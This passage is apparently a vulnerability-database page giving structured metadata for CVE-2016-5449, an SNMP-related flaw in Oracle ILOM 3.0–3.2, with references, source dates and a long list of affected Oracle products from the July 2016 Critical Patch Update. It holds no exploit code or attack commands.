"https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63173", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5449", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "CNNVD", id: "CNNVD-201607-813", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5449", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91986", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5449", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5449", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94268", }, { db: "VULMON", id: "CVE-2016-5449", }, { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "CNNVD", id: "CNNVD-201607-813", }, { db: "NVD", id: "CVE-2016-5449", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94268", }, { db: "VULMON", id: "CVE-2016-5449", }, { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "CNNVD", id: "CNNVD-201607-813", }, { db: "NVD", id: "CVE-2016-5449", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94268", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5449", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91986", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003877", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-813", }, { date: "2016-07-21T10:15:04.880000", db: "NVD", id: "CVE-2016-5449", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-94268", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5449", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91986", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003877", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-813", }, { date: "2024-11-21T02:54:20.300000", db: "NVD", id: "CVE-2016-5449", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Console Redirection Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003877", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, ], trust: 0.6, }, }
var-201607-0655
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect integrity and availability via vectors related to SNMP. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'SNMP' protocol. The 'SNMP' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker could exploit this vulnerability to update, insert, or delete data, possibly causing a denial of service. Affect data integrity and availability
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0655", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", 